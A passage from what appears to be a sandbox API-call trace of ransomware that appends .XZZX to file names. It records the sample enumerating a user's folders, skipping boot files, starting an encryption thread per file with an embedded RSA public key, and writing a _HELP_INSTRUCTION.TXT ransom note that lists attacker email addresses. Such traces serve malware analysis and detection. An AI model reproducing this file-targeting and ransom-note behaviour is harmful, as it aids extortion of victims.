MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.717] lstrcpyW (in: lpString1=0x17be7c, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0238.717] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x124c [0238.717] Sleep (dwMilliseconds=0x96) [0238.872] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0238.873] lstrcmpW (lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpString2="..") returned 1 [0238.873] lstrcmpW (lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpString2=".") returned 1 [0238.873] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0238.873] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="ntldr") returned 0x0 [0238.873] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="NTLDR") returned 0x0 [0238.873] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0238.873] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="ntdetect.com") returned 0x0 [0238.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0238.873] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0238.873] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0238.873] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.873] lstrcpyW (in: lpString1=0x17be7c, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0238.873] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1250 [0238.873] Sleep (dwMilliseconds=0x96) [0239.029] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0239.029] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0239.029] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0239.029] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0239.029] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0239.029] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0239.029] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0239.029] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0239.030] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0239.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0239.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0239.030] SetErrorMode (uMode=0x1) returned 0x1 [0239.030] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT") returned 74 [0239.030] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0239.030] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0239.030] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x1254) returned 0x0 [0239.030] RegQueryValueExW (in: hKey=0x1254, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dc180, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43dc180*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0239.030] RegCloseKey (hKey=0x1254) returned 0x0 [0239.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0239.030] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0239.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1254 [0239.031] CloseHandle (hObject=0x1254) returned 1 [0239.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0239.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0239.031] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0239.032] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0239.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0239.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0239.032] SetErrorMode (uMode=0x1) returned 0x1 [0239.032] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0239.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.032] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0239.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0239.032] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0239.032] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0239.033] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0239.033] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="ntldr") returned 0x0 [0239.033] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="NTLDR") returned 0x0 [0239.033] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0239.033] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0239.033] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0239.033] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0239.033] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0239.033] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.033] lstrcpyW (in: lpString1=0x17be7c, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0239.033] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x125c [0239.033] Sleep (dwMilliseconds=0x96) [0239.184] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0239.185] lstrcmpW (lpString1="A58916D017654CD0CF379F2B1B923118.XZZX", lpString2="..") returned 1 [0239.185] lstrcmpW (lpString1="A58916D017654CD0CF379F2B1B923118.XZZX", lpString2=".") returned 1 [0239.185] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0239.185] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="ntldr") returned 0x0 [0239.185] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="NTLDR") returned 0x0 [0239.185] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0239.185] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="ntdetect.com") returned 0x0 [0239.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0239.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0239.185] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0239.185] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.185] lstrcpyW (in: lpString1=0x17be7c, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0239.185] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.185] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1260 [0239.185] Sleep (dwMilliseconds=0x96) [0239.340] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0239.341] lstrcmpW (lpString1="D9B986602FBC15FEC37446303428FA46.XZZX", lpString2="..") returned 1 [0239.341] lstrcmpW (lpString1="D9B986602FBC15FEC37446303428FA46.XZZX", lpString2=".") returned 1 [0239.341] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0239.341] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="ntldr") returned 0x0 [0239.341] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="NTLDR") returned 0x0 [0239.341] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0239.341] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="ntdetect.com") returned 0x0 [0239.341] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0239.341] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0239.341] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0239.341] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.341] lstrcpyW (in: lpString1=0x17be7c, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0239.341] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1264 [0239.342] Sleep (dwMilliseconds=0x96) [0239.496] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0239.496] lstrcmpW (lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpString2="..") returned 1 [0239.496] lstrcmpW (lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpString2=".") returned 1 [0239.496] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0239.497] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="ntldr") returned 0x0 [0239.497] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="NTLDR") returned 0x0 [0239.497] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0239.497] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="ntdetect.com") returned 0x0 [0239.497] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0239.497] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0239.497] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0239.497] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0239.497] lstrcpyW (in: lpString1=0x17be7c, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0239.497] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0239.497] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1268 [0239.497] Sleep (dwMilliseconds=0x96) [0239.653] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0239.653] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0239.653] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0239.653] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0239.653] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0239.653] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0239.653] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0239.653] lstrcpyW (in: 